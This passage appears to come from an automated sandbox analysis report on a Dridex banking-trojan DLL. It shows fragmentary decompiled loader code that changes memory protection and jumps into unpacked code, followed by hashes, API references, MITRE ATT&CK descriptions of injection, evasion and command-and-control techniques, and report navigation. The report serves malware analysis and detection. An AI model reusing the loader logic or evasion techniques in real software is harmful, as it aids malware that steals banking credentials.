						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E02FE2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02fe221f
0x02fe222d
0x02fe2234
0x02fe2237
0x02fe2241
0x02fe2248
0x02fe2252
0x02fe2258
0x02fe2261
0x02fe226a
0x02fe226d
0x02fe2273
0x02fe2277
0x02fe227f
0x02fe2283
0x02fe2286
0x02fe2289
0x02fe228c
0x02fe228f
0x02fe22a9
0x02fe22af
0x02fe22b2
0x02fe22ba
0x02fe22be
0x02fe22c1
0x02fe22c4
0x02fe22c7
0x02fe22ca
0x02fe22e6
0x02fe2303
0x02fe2328
0x02fe232a
0x02fe2333
0x02fe2336
0x02fe2340
0x02fe2343
0x02fe2346
0x02fe2349
0x02fe234c
0x02fe23a4
0x02fe23a4
0x02fe254a
0x02fe2550
0x02fe244d
0x02fe2453
0x02fe249f
0x02fe249f
0x02fe24bc
0x02fe24e2
0x02fe24f0
0x02fe24f3
0x02fe24f7
0x02fe24fb
0x02fe2502
0x02fe2508
0x02fe250a
0x02fe251c
0x02fe2524
0x02fe252a
0x02fe2530
0x02fe2536
0x00000000
0x00000000
0x02fe253c
0x02fe249f
0x02fe245b
0x02fe2469
0x02fe2471
0x02fe2474
0x02fe2476
0x02fe247c
0x02fe2488
0x02fe248e
0x02fe2491
0x02fe2494
0x02fe238a
0x02fe238a
0x02fe23d8
0x02fe23de
0x02fe23e4
0x02fe23ea
0x02fe23f0
0x02fe23f5
0x02fe23fb
0x02fe23fe
0x02fe2401
0x02fe2409
0x02fe2411
0x02fe2414
0x02fe2417
0x02fe241d
0x02fe2423
0x02fe242e
0x02fe2362
0x02fe2368
0x02fe2368
0x02fe23c5

APIs

VirtualProtect.KERNELBASE ref: 02FE228F
VirtualProtect.KERNELBASE ref: 02FE2328

Strings

t, xrefs: 02FE2409

Memory Dump Source

Source File: 00000003.00000002.1041647437.0000000002FE0000.00000040.00000001.sdmp, Offset: 02FE0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 0138138f75418be9a30103fa234471a279191583b4e8b67202d5cd5d088bd7e8
Instruction ID: 32f2ceeed15c2ed01f238842ac6320b6012801e07e0ec6a4caa9dcef5be06aea
Opcode Fuzzy Hash: 0138138f75418be9a30103fa234471a279191583b4e8b67202d5cd5d088bd7e8
Instruction Fuzzy Hash: 718198B4E04208CFCB04CF99C590A9DFBF1BF88310F65856AEA59AB351D730A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02FE2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02FE2508

Memory Dump Source

Source File: 00000003.00000002.1041647437.0000000002FE0000.00000040.00000001.sdmp, Offset: 02FE0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 37febe48b06d3e08bc0b39ba21970b4a08f8b64e9f8f5f9eeaeab96c3468051c
Instruction ID: b84a570945f031699262480e9e83b26e79f572c1af1c0e3a9643134dcc847a2e
Opcode Fuzzy Hash: 37febe48b06d3e08bc0b39ba21970b4a08f8b64e9f8f5f9eeaeab96c3468051c
Instruction Fuzzy Hash: 5131D6B6E002288FDB14CF68C98069DB7F1BF88204F168699D949A7306D731AE51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 02FE1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02FE1EA8

Memory Dump Source

Source File: 00000003.00000002.1041647437.0000000002FE0000.00000040.00000001.sdmp, Offset: 02FE0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 3d9d957437b6a7089f8ea477adfd2a772a9f80dc2a76325fbebc37a1177e149e
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 2941F3B1E002098FDB04DFA9C4906AEBBF1FF48754F15852EE509AB340D375A840CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report RuRxpMUPN7.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6972 Parent PID: 6016

General

Function 6FC507CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 6FC41494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6FC5218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6FC52790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6FC53060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 033F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 6FC51140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 6FC55720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6FC55AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6FC55B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 6FC55B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 6FC55B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 6FC55B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 6FC55B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 6FC55D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6FC55DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6FC555B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6FC510CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6FC53564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 6FC49144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 6FC4A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6FC592DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6FC484E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6FC514D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6FC46DC8, Relevance: .0, Instructions: 36
COMMON

Function 6FC4BC00, Relevance: .0, Instructions: 16
COMMON

Function 02FE2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON